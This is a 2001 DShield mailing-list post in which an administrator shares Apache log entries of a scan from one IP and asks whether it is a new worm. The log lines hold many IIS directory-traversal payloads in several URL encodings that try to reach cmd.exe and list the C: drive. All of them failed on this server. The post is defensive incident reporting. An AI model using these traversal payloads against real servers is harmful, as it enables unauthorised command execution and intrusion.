[Dshield] New one?

Martin Mueller mueller at webpartner.de
Wed Oct 17 13:05:23 GMT 2001


Hi all,

this log-entrys i found today on a Apache virtual-Webserver of my company.
Sorry, the lines are very long, but all different...

Is this a new "Code Red" or something?
It looks not like the "normal" CR or Nimda to me.

The "Attacking-IP" is located in Brasil(if it is the real :-) ), we are in Germany.

Best regards,

Martin Mueller
----------------------------------------
Webpartner Kommunikationsdienste GmbH
Metzstrasse 14b
81667 Muenchen

Tel: 089/480 88 89-0
Fax: 089/480 88 89-9

mueller at webpartner.de
http://www.webpartner.de
----------------------------------------
Schon geklickt? http://www.urlpartner.de
Favoriten online verwalten
Ein Projekt der Webpartner GmbH




200.199.211.50 - - [17/Oct/2001:08:10:28 +0200] "GET
/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:28 +0200] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:29 +0200] "GET
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:29 +0200] "GET
/wwwroot/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:30 +0200] "GET
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:30 +0200] "GET
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 339 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:31 +0200] "GET
/ftproot/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:31 +0200] "GET
/pbserver/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 339 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:32 +0200] "GET
/rpc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:32 +0200] "GET
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:15 +0200] "GET
/scripts/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 376 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:15 +0200] "GET
/msadc/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 374 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:15 +0200] "GET
/wwwroot/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 376 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:16 +0200] "GET
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 378 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:16 +0200] "GET
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 376 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:17 +0200] "GET
/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 377 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:17 +0200] "GET
/ftproot/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 376 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:17 +0200] "GET
/pbserver/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 377 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:18 +0200] "GET
/rpc/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 372 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:19 +0200] "GET
/samples/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 376 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:22 +0200] "GET
/scripts/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:22 +0200] "GET
/msadc/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:23 +0200] "GET
/iisadmpwd/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:24 +0200] "GET
/cgi-bin/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:26 +0200] "GET
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:27 +0200] "GET
/ftproot/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:28 +0200] "GET
/pbserver/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:30 +0200] "GET
/rpc/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:31 +0200] "GET
/samples/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:34 +0200] "GET
/scripts/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:34 +0200] "GET
/msadc/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:35 +0200] "GET
/iisadmpwd/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:35 +0200] "GET
/wwwroot/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:36 +0200] "GET
/cgi-bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:36 +0200] "GET
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:38 +0200] "GET
/ftproot/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:38 +0200] "GET
/pbserver/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:39 +0200] "GET
/rpc/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:39 +0200] "GET
/samples/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:44 +0200] "GET
/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 350 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:44 +0200] "GET
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 348 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:45 +0200] "GET
/iisadmpwd/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 352 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:45 +0200] "GET
/wwwroot/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 350 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:46 +0200] "GET
/cgi-bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 350 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:46 +0200] "GET
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 351 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:47 +0200] "GET
/ftproot/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 350 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:47 +0200] "GET
/pbserver/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 351 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:47 +0200] "GET
/rpc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 346 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:48 +0200] "GET
/samples/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 350 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"






More information about the list mailing list